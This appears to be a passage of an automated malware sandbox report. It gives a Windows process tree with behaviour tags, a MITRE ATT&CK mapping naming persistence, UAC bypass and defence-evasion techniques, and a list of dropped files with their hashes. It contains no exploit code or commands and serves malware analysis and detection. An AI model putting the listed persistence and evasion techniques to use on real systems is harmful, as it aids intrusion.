C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
163KB
MD5b20e29f2b88234cda8b95b43a4fec8aa
SHA113cca52a0dc3b9b352e14688f444ad9bcb9a9f4f
SHA256e2481565a6c7a26690e99f63eea8e04615f7b3d92ca4ada11e331ce1053f962a
SHA512019a4afbcd4c6236c226a05b0864df4f310fb91d41847dfcd84207d276a6219f66b725f5d3f637e7049d87fc81c88b8969a3061970be505bade70f767511313a
-
Filesize
13KB
MD502a326274f6fbc2c10002e6989f4571f
SHA15d5aee1b6829fa401036968a034440fc07582191
SHA256b677c04687a6360ba75cc71d70331b46c00794cbffc3a65205207a8369df4015
SHA51230928b18c60eef0ba28017d1bdd8608a0ae51b006d4da6fd68b25aa7c639991ba720752cd6c346db14d32d5caa6a89355b70b31a6fd85187930740fd55524743
-
Filesize
41KB
MD564cd4453cc9dfa1362050feb3885ae92
SHA152e2514c2741b17a32e0cab511d834a52e43cf7e
SHA25641d09ea1e26107bbc81f032d714c938a9e21cb3d7dc9d9547416af344f8666fd
SHA512d19e939a7943d9d0e937d10fd0ef1eab08587d48371d7294be6d7001ddbfba3b61f3572fd50bd9d7501e895799ad04d49e49df74686ca4f3ef22bcf91bec23e8
-
Filesize
13KB
MD5f19c7b49a13866a1f48fbc4aa41b61bd
SHA19224d4788c1b08154e580bfb05a7d7d9c6ce64a7
SHA256936732bc99f3197c4852b4270ca8bf165cbc9a2329fd0fa8607aa72ddfd63dfc
SHA5129d7cb2da4ebb2ab02dbfe2a261c746b82ef8ceb5a65e4a80da72b11c69436bafe65af7782a2ad2d0beece296dc2de2605be8a1dca226a4e9d66228b5cca27967
-
Filesize
33KB
MD5ccb23d1b4b52148a5b74f598b9cf34eb
SHA1f9ac40de5bc8e0c7e534609c4a6e1261045cc24f
SHA25653b972cd3facf2433a36caff23b3d962c2ea303dc3bcae84d80c2929862fae2a
SHA51261556840d43ffd924eea1d9ddc3661e4869c0259db4bcf2319d3453c6feac1c547d984dc9f60370928ab18cddd722367e1191112b1abc579b352058336f19f0a
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
944B
MD5ce4540390cc4841c8973eb5a3e9f4f7d
SHA12293f30a6f4c9538bc5b06606c10a50ab4ecef8e
SHA256e834e1da338b9644d538cefd70176768816da2556939c1255d386931bd085105
SHA5122a3e466cb5a81d2b65256053b768a98321eb3e65ff46353eefc9864f14a391748116f050e7482ddd73a51575bf0a6fc5c673023dade62dbd8b174442bae1cc6b
-
Filesize
1KB
MD5cc88f379beccf096b213ed725d6030cc
SHA1b5cfe4a0a0d6905ee4c393c2a86c6d4534625b9e
SHA256a401be34a47352c4ea50c723eaac8256dfdcc7108b46b9cb615377509a7f2191
SHA512896ddfba528b542ff16abccc426cbcf23de7a77ce987b420343b60f7af61ed1194b6e7cffa3a1bf134affcef53e758518609cd0cdc42176513cdcf72a2bd9e09
-
Filesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
Filesize
944B
MD5ba169f4dcbbf147fe78ef0061a95e83b
SHA192a571a6eef49fff666e0f62a3545bcd1cdcda67
SHA2565ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1
SHA5128d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c
-
Filesize
944B
MD5e3161f4edbc9b963debe22e29658050b
SHA145dbf88dadafe5dd1cfee1e987c8a219d3208cdb
SHA2561359d6daeaed2f254b162914203c891b23139cc236a3bf75c2dfcbe26265c84a
SHA512006ffb8f37d1f77f8ee79b22ffa413819f565d62773c632b70985759572121c6ab4743139d16d885f8c0ff9d0e0b136686741728b3e142ee54aea3bb733dffb2
-
Filesize
5KB
MD5f6515df66debd922c1d9699648bc06bd
SHA1b4f7d322b28db243e2c05f140705daf7e187d1ca
SHA2565c3eaf6874c3bbda22c734b4ae2738cd3f2ac5f43f38c3065567fa872396c796
SHA51293f37508e5c0139c850bdabda0e6b8f961e668f14a73ba317f0b7424272a4f2c0cbd4ed36c50ca2c75d3ab15b13e70876d0c6cc7e15cc6af2c517786b40f99be
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
14B
MD5ce585c6ba32ac17652d2345118536f9c
SHA1be0e41b3690c42e4c0cdb53d53fc544fb46b758d
SHA256589c942e748ea16dc86923c4391092707ce22315eb01cb85b0988c6762aa0ed3
SHA512d397eda475d6853ce5cc28887690ddd5f8891be43767cdb666396580687f901fb6f0cc572afa18bde1468a77e8397812009c954f386c8f69cc0678e1253d5752
-
Filesize
6KB
MD50db918fe119f6cbaaf1bc82a7311a72b
SHA1fe87bc4ca0a3a3cec38707ee2af3846db22fa113
SHA256707975ea403332c5545ab72b260516c99b76340a653ec0440a925261a82c8871
SHA512022687ab1a253ad2b5b1775b047b76e0e239edf09e62d9a1c72f7a59a774831d2e7389b327172704e6c024fa0889489d0370fc9e988505383db114529f516405
-
Filesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
Filesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
Filesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
Filesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
Filesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
Filesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
Filesize
64KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
64KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
148KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
64KB
-
Filesize
168KB
-
Filesize
168KB
-
Filesize
56KB
-
Filesize
168KB
-
Filesize
760KB
-
Filesize
2.0MB
-
Filesize
10.8MB
-
Filesize
1.8MB
-
Filesize
8KB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
32KB
-
Filesize
2.0MB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
32KB
-
Filesize
760KB